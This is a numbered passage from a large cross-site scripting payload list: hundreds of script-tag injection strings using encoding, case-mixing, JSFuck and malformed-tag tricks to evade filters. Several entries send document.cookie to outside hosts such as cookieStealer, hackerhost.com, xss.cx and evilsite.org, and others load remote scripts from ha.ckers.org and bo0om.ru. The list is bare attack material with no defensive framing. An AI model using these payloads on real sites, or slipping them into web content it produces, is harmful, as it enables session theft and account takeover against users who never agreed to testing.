  5087. <SCRIPT =”blah” SRC=”http://ha.ckers.org/xss.js"></SCRIPT>
  5088. <script charset=”\x22>javascript:alert(1)</script>
  5089. <script>/* **chr*/log(*num*)// */</script>
  5090. ‘“`><script>/* **chr*log(*num*)// */</script>
  5091. “`’><script>*chr*log(*num*)</script>
  5092. <script>```${``[class extends[alert``]{}]}```</script>
  5093. <script>[class extends[alert````]{}]</script>
  5094. <script ~~~>confirm(0%0)</script ~~~>
  5095. <script>’confirm(0)%3B<%2Fscript>
  5096. ><script>’confirm(0)%3B<%2Fscript>
  5097. “<script>’confirm(0)%3B<%2Fscript>”
  5098. “\”><script>’confirm(0)%3B<%2Fscript>”,
  5099. <script>confirm(0);</script>
  5100. ><script>confirm(0)</script>
  5101. “<script>confirm(0);</script>”
  5102. “><”script”>”confirm(0)”</”script”>
  5103. “\”><script>confirm(0)</script>”,
  5104. <%<! — ‘%><script>confirm(1);</script →
  5105. <sc’+’ript>confirm(1)</script>
  5106. <script>/* */confirm(1)/* */</script>
  5107. <script>confirm (1);</script>
  5108. <script>confirm(1)</script>
  5109. <script ~~~>confirm(1)</script ~~~>
  5110. >”<>”<script>confirm(1)</script>
  5111. “‘><script>confirm(1)</script>”,
  5112. [<script>]=*confirm(1)</script>
  5113. <script Confirm(1);</script>
  5114. “/><script>confirm(1);</script><img src=x onerror=x.onerror=prompt(0)>
  5115. “\”/><script>confirm(1);</script><img src=x onerror=x.onerror=prompt(0)>”
  5116. >”<>”<script>confirm(2)</script>
  5117. <script>confirm(88199)</script>
  5118. <script>confirm(Components.lookupMethod(Components.lookupMethod(Components.lookupMethod(Components.lookupMethod(this,’window’)(),’document’)(), ‘getElementsByTagName’)(‘html’)[0],’innerHTML’)().match(/d.*’/));</script>
  5119. <script>confirm(document.documentElement.innerHTML.match(/’([^’]%2b)/)[1])</script>
  5120. <script>confirm(document.getElementsByTagName(‘html’)[0].innerHTML.match(/’([^’]%2b)/)[1])</script>
  5121. <script>confirm(document.head.childNodes[3].text)</script>
  5122. <script>confirm(document.head.innerHTML.substr(146,20));</script>
  5123. >”><script>confirm(document.location)</script>&
  5124. <SCRIPT>confirm(document.location);</SCRIPT>
  5125. <script>confirm(“&quot;no”)</script>
  5126. <script ^__^>confirm(String.fromCharCode(49))</script ^__^
  5127. <script>confirm(String.fromCharCode(88,83,83));</script>
  5128. ><script>confirm(String.fromCharCode(88,83,83));</script>
  5129. “<script>confirm(String.fromCharCode(88,83,83));</script>”
  5130. “\”><script>confirm(String.fromCharCode(88,83,83));</script>”,
  5131. <script /***/>/***/confirm(‘\uFF41\uFF4C\uFF45\uFF52\uFF54\u1455\uFF11\u1450’)/***/</script /***/
  5132. <script>/*confirm(“Woops”);*/</script>
  5133. <script>confirm(x.y[0])</script>
  5134. <script>confirm(x.y.x.y.x.y[0]);confirm(x.x.x.x.x.x.x.x.x.y.x.y.x.y[0]);</script>
  5135. <script>``.constructor.constructor`confirm\`1\````</script>
  5136. <script>continueURI=/login2.jsp?friend=<img src=xonerror=alert(1)>;</script>
  5137. “><script>co\u006efir\u006d`1`</script>
  5138. “><ScRiPt>co\u006efir\u006d`1`</ScRiPt>
  5139. <script>crypto.generateCRMFRequest(‘CN=0’,0,0,null,’alert(1)’,384,null,’rsa-dual-use’)</script>
  5140. <script>debugger;</script>
  5141. <script defer>alert(1)</script>
  5142. -<script/defer>alert(1)</script>
  5143. <script>delete[a=alert]/prompt a(1)</script>
  5144. <SCriPt>delete alert;alert(1)</sCriPt>
  5145. <script>delete[a=this[atob(‘YWxlcnQ=’)]]/prompt a(1)</script>
  5146. <script>delete /* code to execute */throw~delete~typeof~/* code to execute */delete[a=/* function */]/delete a(/* params */)var a = (new function(/* code to execute */))();</script>
  5147. <script>d.innerHTML+=’’;</script>
  5148. <script>`</div><div>`==alert(123)</script>
  5149. <script>`</div><div>`-alert(123)</script>
  5150. <script>`</div><div>`/=alert(123)</script>
  5151. <script>`</div><div>`/alert(123)</script>
  5152. <script>`</div><div>`*=alert(123)</script>
  5153. <script>`</div><div>`%alert(123)</script>
  5154. <script>`</div><div>`+alert(123)</script>
  5155. //’/<@/></script></div></script> →<select */onclick=alert()><o>1<o>2')//”<! — 
  5156. <script>document.body.innerHTML=”<h1>XSS-Here</h1>”</script>
  5157. <script>document.forms[0].submit(); </script>
  5158. <script> document.getElementById(%22safe123%22).click=function()+{alert(Safe.get());} document.getElementById(%22safe123%22).click({‘type’:’click’,’isTrusted’:true}); </script>
  5159. <script> document.getElementById(%22safe123%22).click=function()+{confirm(Safe.get());} document.getElementById(%22safe123%22).click({‘type’:’click’,’isTrusted’:true}); </script>
  5160. <script> document.getElementById(%22safe123%22).setCapture(); document.getElementById(%22safe123%22).click(); </script>
  5161. <script>document.getElementById(“div2”).innerHTML = document.getElementById(“div1”).innerHTML;</script>
  5162. “><script>document.location=’http://cookieStealer/cgi-bin/cookie.cgi?'+document.cookie</script>
  5163. “><script>document.location=’http://your.site.com/cgi-bin/cookie.cgi?'???.cookie</script>
  5164. <<script>document.vulnerable=true;</script>
  5165. <! — — →<script>document.vulnerable=true;</script><! — — →
  5166. <![<! — ]]<script>document.vulnerable=true;// →</script>
  5167. <script>document.vulnerable=true;</script>
  5168. &<script>document.vulnerable=true;</script>
  5169. <<SCRIPT>document.vulnerable=true;//<</SCRIPT>
  5170. <script>document.write(‘\074\151\155\147\040\163\162\143\075\061\040\157\156\145\162\162\157\162\075\141\154\145\162\164\050\061\051\076’);</script>
  5171. <script>document[‘write’](88199);</script>
  5172. <script>document.write(‘<a hr\ef=j\avas\cript\:a\lert(2)>blah</a>’);</script>
  5173. <script>document.write(Array(184).join(‘<marquee>’))</script>
  5174. <script>document.write(‘<img src=1 onerror=alert(1)>’);</script>
  5175. <script>document.write(“<img/**/src=’1'/**/onerror=’alert(1)’/>”);</script>
  5176. <SCRIPT>Document.write(‘<img src=\’http://hackerhost.com/getcookie.php?cookie='+escape(document.cookie)+'\' height=1 width=1>’);</SCRIPT>
  5177. <script>document.write(“<img src=//xss.cx/” + document.cookie + “>”)</script>
  5178. “/><script>document.write(“<img src=//xss.cx/” + document.cookie + “>”)</script>
  5179. <script> document.write(‘<math><! — ‘); </script> <i name=” →<head><script>//”>alert(1)<! — </script> →
  5180. <script>document.write(‘<math><! — ‘);</script><i name=” →<head><script>//”>alert(1)<! — </script> →
  5181. <SCRIPT>document.write(“<SCRI”)
  5182. <script>document.write(‘<script>/*’);</script>*/alert(1)</script>
  5183. <SCRIPT>document.write(“<SCRI”);</SCRIPT>PT id=XSS SRC=”http://xxxx.com/xss.js"></SCRIPT>
  5184. <SCRIPT>document.write(“<SCRI”);</SCRIPT>PT SRC=”http://3w.org/xss.js"></SCRIPT>
  5185. <;SCRIPT>;document.write(“;<;SCRI”;);<;/SCRIPT>;PT SRC=”;http://ha.ckers.org/xss.js";>;<;/SCRIPT>;
  5186. <SCRIPT>document.write(“<SCRI”);</SCRIPT>PT SRC=”http://ha.ckers.org/xss.js"></SCRIPT>
  5187. <script>document.write(“<SCRI”);</SCRIPT>PT SRC=”http://www.securitycompass.com/xss.js"></script>
  5188. <SCRIPT>document.write(“<SCRI”);</SCRIPT>PT SRC=”http://xss.cx/xss.js"></SCRIPT>
  5189. <SCRIPT>document.write(“<SCRI”);</SCRIPT>PT src=”http://xss.ha.ckers.org/a.js"></SCRIPT>
  5190. <SCRIPT>document.write(“<SCRI”);</SCRIPT>PT SRC=”httx://xss.rocks/xss.js”></SCRIPT>
  5191. <script>document.write(String.fromCharCode(60,105,109,103,32,115,114,99,61,49,32,111,110,101,114,114,111,114,61,97,108,101,114,116,40,48,41,62));</script>
  5192. <script>document.write(String.fromCharCode(b??WAN?));</script>
  5193. <script>document.write(String.fromCharCode(xss));</script>
  5194. <script>document.write(‘\u003C\u0069\u006D\u0067\u0020\u0073\u0072\u0063\u003D\u0031\u0020\u006F\u006E\u0065\u0072\u0072\u006F\u0072\u003D\u0061\u006C\u0065\u0072\u0074\u0028\u0031\u0029\u003E’);</script>
  5195. <script>document.write(‘\x3C\x69\x6D\x67\x20\x73\x72\x63\x3D\x31\x20\x6F\x6E\x65\x72\x72\x6F\x72\x3D\x61\x6C\x65\x72\x74\x28\x31\x29\x3E’);</script>
  5196. <SCRIPT>document.write(“XSS”);</SCRIPT>
  5197. <SCRIPT>document.write(“XSS”);</SCRIPT>
  5198. <script>’e1v2a3l’.replace(/(.).(.).(.).(.)/, function(match,$1,$2,$3,$4) { this[$1+$2+$3+$4](/* code to eval() */); })</script>
  5199. <script>eval(“\141\154\145\162\164`1`”)</script>
  5200. <script>eval(“\141\154\145\162\164`1`”)</script> // Octal escapes combined ES6 Diacritical Grave
  5201. <script>eval(“\61\6c\65……”);<script>
  5202. <script>eval.call`${‘prompt\x281)’}`</script>
  5203. <script>eval(location.hash)</script> (Firefox)
  5204. <script>eval(location.hash.slice(1))</script>
  5205. <script>eval(location.hash.slice(1))</script>#alert(1)
  5206. <script>eval(location.hash.slice(1))</script>#alert(a)
  5207. <script>eval_r(z)</script>
  5208. <script>eval(String.fromCharCode(97,108,101,114,116,40,39,49,39,41))</script>
  5209. <script>eval(‘\\u’+’0061'+’lert(1)’)</script>
  5210. <script>eval(“\x61\x6c\x65\x72\x74(1)”);</script>
  5211. <script>eval(“\x61\x6c\x65\x72\x74(1)”);</script> // Hexadecimal escapes using eval
  5212. <script>eval(z)</script>
  5213. <script>f=document.createElement(“iframe”);f.id=”pwn”;f.src=”/robots.txt”;f.onload=()=>{x=document.createElement(‘script’);x.src=’//bo0om.ru/csp.js’;pwn.contentWindow.document.body.appendChild(x)};document.body.appendChild(f);</script>
  5214. <script firefox>alert(1)</script>
  5215. <script>foo</script>
  5216. <SCRIPT FOR=document EVENT=onreadystatechange>alert(1)</SCRIPT>
  5217. <script for=document event=onreadystatechange>getElementById(‘safe123’).click()</script>
  5218. <SCRIPT FOR=document EVENT=onreadystatechange>javascript:alert(1)</SCRIPT>
  5219. <SCRIPT+FOR=document+EVENT=onreadystatechange>MouseEvent=function+MouseEvent(){};test=new+MouseEvent();test.isTrusted=true;test.type=%22click%22;getElementById(%22safe123%22).click=function()+{alert(Safe.get());};getElementById(%22safe123%22).click(test);</SCRIPT>#
  5220. <SCRIPT+FOR=document+EVENT=onreadystatechange>MouseEvent=function+MouseEvent(){};test=new+MouseEvent();test.isTrusted=true;test.type=%22click%22;getElementById(%22safe123%22).click=function()+{confirm(Safe.get());};getElementById(%22safe123%22).click(test);</SCRIPT>#
  5221. <script for=_ event=onerror()>alert(/@ma1/)</script><img id=_ src=>
  5222. <script for=_ event=onerror()>confirm(/@ma1/)</script><img id=_ src=>
  5223. <script>for((i)in(self))eval(i)(1)</script>
  5224. <script> function b() { return Safe.get(); } alert(b({type:String.fromCharCode(99,108,105,99,107),isTrusted:true})); </script>
  5225. <script> function b() { return Safe.get(); } alert(b({type:String.fromCharCode(99,108,105,99,107),isTrusted:true})); </script>
  5226. <script> function b() { return Safe.get(); } alert(b({type:String.fromCharCode(99,108,105,99,107),isTrusted:true})); </script>
  5227. <script> function b() { return Safe.get(); } confirm(b({type:String.fromCharCode(99,108,105,99,107),isTrusted:true})); </script>
  5228. <script> function foo(elem, doc, text) { elem.onclick = function (e) { e.__defineGetter__(text[0], function () { return true }) alert(Safe.get()); }; var event = doc.createEvent(text[1]); event.initEvent(text[2], true, true); elem.dispatchEvent(event); } </script> <img src=http://www.google.fr/images/srpr/logo3w.png onload=foo(this,this.ownerDocument,this.name.split(/,/)) name=isTrusted,MouseEvent,click width=0 height=0 /> #
  5229. <script> function foo(elem, doc, text) { elem.onclick = function (e) { e.__defineGetter__(text[0], function () { return true }) alert(Safe.get()); }; var event = doc.createEvent(text[1]); event.initEvent(text[2], true, true); elem.dispatchEvent(event); } </script> <img src=http://www.google.fr/images/srpr/logo3w.png onload=foo(this,this.ownerDocument,this.name.split(/,/)) name=isTrusted,MouseEvent,click width=0 height=0 /> #
  5230. <script> function foo(elem, doc, text) { elem.onclick = function (e) { e.__defineGetter__(text[0], function () { return true }) alert(Safe.get()); }; var event = doc.createEvent(text[1]); event.initEvent(text[2], true, true); elem.dispatchEvent(event); } </script> <img src=http://www.google.fr/images/srpr/logo3w.png onload=foo(this,this.ownerDocument,this.name.split(/,/)) name=isTrusted,MouseEvent,click width=0 height=0 /> #
  5231. <script> function foo(elem, doc, text) { elem.onclick = function (e) { e.__defineGetter__(text[0], function () { return true }) confirm(Safe.get()); }; var event = doc.createEvent(text[1]); event.initEvent(text[2], true, true); elem.dispatchEvent(event); } </script> <img src=http://www.google.fr/images/srpr/logo3w.png onload=foo(this,this.ownerDocument,this.name.split(/,/)) name=isTrusted,MouseEvent,click width=0 height=0 /> #
  5232. <script> (function (o) { function exploit(x) { if (x !== null) alert(‘User cookie is ‘ %2B x); else console.log(‘fail’); } o.onclick = function (e) { e.__defineGetter__(‘isTrusted’, function () { return true; }); exploit(Safe.get()); }; var e = document.createEvent(‘MouseEvent’); e.initEvent(‘click’, true, true); o.dispatchEvent(e); })(document.getElementById(‘safe123’)); </script>
  5233. <script> (function (o) { function exploit(x) { if (x !== null) alert(‘User cookie is ‘ %2B x); else console.log(‘fail’); } o.onclick = function (e) { e.__defineGetter__(‘isTrusted’, function () { return true; }); exploit(Safe.get()); }; var e = document.createEvent(‘MouseEvent’); e.initEvent(‘click’, true, true); o.dispatchEvent(e); })(document.getElementById(‘safe123’)); </script>
  5234. <script> (function (o) { function exploit(x) { if (x !== null) confirm(‘User cookie is ‘ %2B x); else console.log(‘fail’); } o.onclick = function (e) { e.__defineGetter__(‘isTrusted’, function () { return true; }); exploit(Safe.get()); }; var e = document.createEvent(‘MouseEvent’); e.initEvent(‘click’, true, true); o.dispatchEvent(e); })(document.getElementById(‘safe123’)); </script>
  5235. <script>(function() {var event = document.createEvent(%22MouseEvents%22);event.initMouseEvent(%22click%22, true, true, window, 0, 0, 0, 0, 0, false, false, false, false, 0, null);var fakeData = [event, {isTrusted: true}, event];arguments.__defineGetter__(‘0’, function() { return fakeData.pop(); });alert(Safe.get.apply(null, arguments));})();</script>
  5236. <script>(function() {var event = document.createEvent(%22MouseEvents%22);event.initMouseEvent(%22click%22, true, true, window, 0, 0, 0, 0, 0, false, false, false, false, 0, null);var fakeData = [event, {isTrusted: true}, event];arguments.__defineGetter__(‘0’, function() { return fakeData.pop(); });confirm(Safe.get.apply(null, arguments));})();</script>
  5237. <script>function x(window) { eval(location.hash.substr(1)) }; open(%22javascript:opener.x(window)%22)</script>#var xhr = new window.XMLHttpRequest();xhr.open(‘GET’, ‘http://xssme.html5sec.org/xssme2’, true);xhr.onload = function() { alert(xhr.responseText.match(/cookie = ‘(.*?)’/)[1]) };xhr.send();
  5238. <script>function x(window) { eval(location.hash.substr(1)) }; open(%22javascript:opener.x(window)%22)</script>#var xhr = new window.XMLHttpRequest();xhr.open(‘GET’, ‘http://xssme.html5sec.org/xssme2', true);xhr.onload = function() { confirm(xhr.responseText.match(/cookie = ‘(.*?)’/)[1]) };xhr.send();
  5239. <script>function x(window) { eval(location.hash.substr(1)) }</script><iframe id=iframe src=%22javascript:parent.x(window)%22><iframe>#var xhr = new window.XMLHttpRequest();xhr.open(‘GET’, ‘http://xssme.html5sec.org/xssme2', true);xhr.onload = function() { alert(xhr.responseText.match(/cookie = ‘(.*?)’/)[1]) };xhr.send();
  5240. <script>function x(window) { eval(location.hash.substr(1)) }</script><iframe id=iframe src=%22javascript:parent.x(window)%22><iframe>#var xhr = new window.XMLHttpRequest();xhr.open(‘GET’, ‘http://xssme.html5sec.org/xssme2', true);xhr.onload = function() { confirm(xhr.responseText.match(/cookie = ‘(.*?)’/)[1]) };xhr.send();
  5241. <script>history.pushState(0,0,’/i/am/somewhere_else’);</script>
  5242. ‘“</Script><Html /Onmouseover=(alert)(1) //
  5243. <script?=”>”?=”http://yoursite.com/xss.js?69,69"></script>
  5244. <SCRIPT id=XSS SRC=http://127.0.0.1></SCRIPT>
  5245. <SCRIPT id=XSS SRC=”http://xxxx.com/xss.jpg"></SCRIPT>
  5246. <SCRIPT id=XSS SRC=http://xxxx.com/xss.js?<B>
  5247. <SCRIPT id=XSS SRC=http://xxxx.com/xss.js></SCRIPT>
  5248. <script>if(top!=self)top.location=location</script>
  5249. <script>if(“x\*chr*”.length==1) { log(*num*);}</script>
  5250. <script>if(“x\\xE0\xB9\x92”.length==2) { javascript:alert(1);}</script>
  5251. <script>if(“x\\xE1\x96\x89”.length==2) { javascript:alert(1);}</script>
  5252. <script>if(“x\\xEE\xA9\x93”.length==2) { javascript:alert(1);}</script>
  5253. </script><img/*%00/src=”worksinchrome&colon;prompt(1)”/%00*/onerror=’eval(src)’>
  5254. </script><img/*%00/src=”worksinchrome&colon;prompt&#x28;1&#x29;”/%00*/onerror=’eval(src)’>
  5255. <script/img>alert(199)</script/>
  5256. </script><img/*/src=”worksinchrome&colon;prompt&#x28;1&#x29;”/*/onerror=’eval(src)’>
  5257. <script+&injection=>alert(1)></script>
  5258. <script itworksinallbrowsers>/*<script* */alert(1)</script ?
  5259. <script itworksinallbrowsers>/*<script* */alert(1)</script
  5260. <script itworksinallbrowsers>/*<script* */alert(1)</script
  5261. <script itworksinallbrowsers>/*<script* */confirm(1)</script ?
  5262. <script itworksinallbrowsers>/*<script* */confirm(1)</script
  5263. <script>javascript:alert(1)</script>
  5264. “`’><script>-javascript:alert(1)</script>
  5265. <script>javascript:alert(1)</script\x0A
  5266. <script>javascript:alert(1)</script\x0B
  5267. <script>javascript:alert(1)</script\x0D
  5268. <script>javascript:alert(1)<\x00/script>
  5269. <script>//jaVasCript:/*-/*`/*\`/*’/*”/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/ — !>\x3csVg/<sVg/oNloAd=alert()//>\x3e</script>
  5270. <script>/*jaVasCript:/*-/*`/*\`/*’/*”/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/ — !>\x3csVg/<sVg/oNloAd=alert()//>\x3e*/</script>
  5271. ‘“”><script language=”JavaScript”> alert(‘X \nS \nS’);</script>
  5272. ‘“”><script language=”JavaScript”> alert(‘X nS nS’);</script>
  5273. <script language=”JavaScript”>alert(‘XSS’)</script>
  5274. <script language=’javascript’ src=’%(jscript)s’></script>
  5275. <SCRIPT LANGUAGE=”VBScript”>%0a%0dFunction window_onload%0a%0dAlert 1%0a%0dEnd Function </SCRIPT>
  5276. <script language=vbs></script><img src=xx:x onerror=”::alert’ @insertScript ‘::”>
  5277. scriptlet.html”></LAYER>
  5278. <scriptlet> <implements type=”behavior”/><script>alert(1)</script></scriptlet>
  5279. <script>let{location={href:’http://evil.com/ ‘}}=0;alert(location.href);</script>
  5280. <script> location.href = ‘data:text/html;base64,PHNjcmlwdD54PW5ldyBYTUxIdHRwUmVxdWVzdCgpO3gub3BlbigiR0VUIiwiaHR0cDovL3hzc21lLmh0bWw1c2VjLm9yZy94c3NtZTIvIix0cnVlKTt4Lm9ubG9hZD1mdW5jdGlvbigpIHsgYWxlcnQoeC5yZXNwb25zZVRleHQubWF0Y2goL2RvY3VtZW50LmNvb2tpZSA9ICcoLio/KScvKVsxXSl9O3guc2VuZChudWxsKTs8L3NjcmlwdD4=’; </script>
  5281. <script>location.href=decodeURIComponent(location.hash.slice(1));</script>
  5282. <script>location.href=’http://127.0.0.1:8088/cookie.php?cookie='+escape(document.cookie);</script>
  5283. <script>location.href=”http://www.evilsite.org/cookiegrabber.php?cookie="??(document.cookie)</script>
  5284. <script>location.href;’javascript:alert(1)’</script>
  5285. <script>location.href;’javascript:alert%281%29'</script>
  5286. “`’><script>lo*chr*g(*num*)</script>
  5287. <script>logChr(0)</script>
  5288. <script> logChr0x09(1); </script>
  5289. “‘`><script>log*chr*(*num*)</script>
  5290. ‘/<\/?(script|meta|link|frame|iframe).*>/Uis’,
  5291. <script>new class extends alert(1){}</script>
  5292. <script>new class extends class extends class extends class extends alert(1){}{}{}{}</script>
  5293. <script>new function(){new.target.constructor(‘alert(1)’)();}</script>
  5294. <script>new Image()[unescape(‘%6f%77%6e%65%72%44%6f%63%75%6d%65%6e%74’)][atob(‘ZGVmYXVsdFZpZXc=’)][8680439..toString(30)](1)</script>
  5295. <script>Object.defineProperties(window, {Safe: {value: {get: function() {return document.cookie}}}});alert(Safe.get())</script>
  5296. <script>Object.defineProperties(window, {Safe: {value: {get: function() {return document.cookie}}}});confirm(Safe.get())</script>
  5297. <script>Object.defineProperty(window, ‘Safe’, {value:{}});Object.defineProperty(Safe, ‘get’, {value:function() {return document.cookie}});alert(Safe.get())</script>
  5298. <script>Object.defineProperty(window, ‘Safe’, {value:{}});Object.defineProperty(Safe, ‘get’, {value:function() {return document.cookie}});confirm(Safe.get())</script>
  5299. <script>Object.__noSuchMethod__ = Function,[{}][0].constructor._(‘alert(1)’)()</script>
  5300. <script>Object.__noSuchMethod__ = Function,[{}][0].constructor._(‘javascript:alert(1)’)()</script>
  5301. <script/onload=confirm(1)></script>
  5302. <script onLoad script onLoad=”javascript:javascript:alert(1)”></script onLoad>
  5303. <script/onreadystatechange=alert(1)>
  5304. <SCRIPT onreadystatechange=javascript:javascript:alert(1);></SCRIPT>
  5305. <script onReadyStateChange script onReadyStateChange=”javascript:javascript:alert(1)”></script onReadyStateChange>
  5306. <script>parent[‘alert’](1)</script>
  5307. <script>%(payload)s</script>
  5308. <<SCRIPT>%(payload)s//<</SCRIPT>
  5309. <script>Promise.reject(“1”).then(null,alert)</script>
  5310. <script>prompt(1234)</script>
  5311. <*script>prompt(123)<*/script>
  5312. ‘ →”>’>’”<script>prompt(198)</script>;” f0r=TRUE
  5313. < s c r i p t > p r o m p t ( 1 ) < / s c r i p t >
  5314. <script>prompt(1)</script>
  5315. <script>prompt(1);</script>
  5316. “><script>`#${prompt(1)}#`</script>
  5317. \”><script>prompt(1)</script>
  5318. <script>prompt(1)</script>@gmail.com<isindex formaction=javascript:alert(/XSS/) type=submit>’ →”></script>
  5319. <script>prompt(88199)</script>
  5320. <script>prompt.call`${1}`</script>
  5321. <script>prompt(-[])</script>
  5322. scriptprop={{_factory}}
  5323. <script>ReferenceError.prototype.__defineGetter__(‘name’, function(){alert(123)}),x</script>
  5324. <script>ReferenceError.prototype.__defineGetter__(‘name’, function(){alert(1)}),x</script>
  5325. <script>ReferenceError.prototype.__defineGetter__(‘name’, function(){javascript:alert(1)}),x</script>
  5326. <script>Reflect.construct(function(){new.target.constructor(‘alert(1)’)()},[])</script>
  5327. <script/renwa~~~>;alert(1);</script/X~~~>
  5328. <script>(()=>{return this})().alert(1)</script>
  5329. <script>RuntimeObject(“w*”)[“window”][“alert”](1);</script>
  5330. <script>(+[])[([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]][([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]((![]+[])[+!+[]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]+(!![]+[])[+[]]+([][([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]+[])[[+!+[]]+[!+[]+!+[]+!+[]+!+[]]]+[+[]]+([][([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]+[])[[+!+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]]])()</script>
  5331. <script>$=~[];$={___:++$,$$$$:(![]+””)[$],__$:++$,$_$_:(![]+””)[$],_$_:++$,$_$$:({}+””)[$],$$_$:($[$]+””)[$],_$$:++$,$$$_:(!””+””)[$],$__:++$,$_$:++$,$$__:({}+””)[$],$$_:++$,$$$:++$,$___:++$,$__$:++$};$.$_=($.$_=$+””)[$.$_$]+($._$=$.$_[$.__$])+($.$$=($.$+””)[$.__$])+((!$)+””)[$._$$]+($.__=$.$_[$.$$_])+($.$=(!””+””)[$.__$])+($._=(!””+””)[$._$_])+$.$_[$.$_$]+$.__+$._$+$.$;$.$$=$.$+(!””+””)[$._$$]+$.__+$._+$.$+$.$$;$.$=($.___)[$.$_][$.$_];$.$($.$($.$$+”\””+$.$_$_+(![]+””)[$._$_]+$.$$$_+”\\”+$.__$+$.$$_+$._$_+$.__+”(“+$.___+”)”+”\””)())();</script>
  5332. </script><script>’%0A’-alert(1)//
  5333. </script><script>alert(0x000123)</script>
  5334. \”></script><script>alert(0x000123)</script>
  5335. \”></sCriPt><sCriPt >alert(0x000123)</sCriPt>
  5336. < / script >< script >alert(123)< / script >
  5337. </script><script>alert(123)</script>
  5338. <;/script>;<;script>;alert(1)<;/script>;
  5339. </script><script>alert(1)</script>
  5340. </script><script>alert(1)</script>
  5341. </script><script >alert(document.cookie)</script>
  5342. // →</SCRIPT><SCRIPT>alert(String.fromCharCode(88,83,83));
  5343. ‘</script><script>alert(String.fromCharCode(88,83,83))</script>/
  5344. ‘;</script>”>’><SCrIPT>alert(String.fromCharCode(88,83,83))</scRipt>
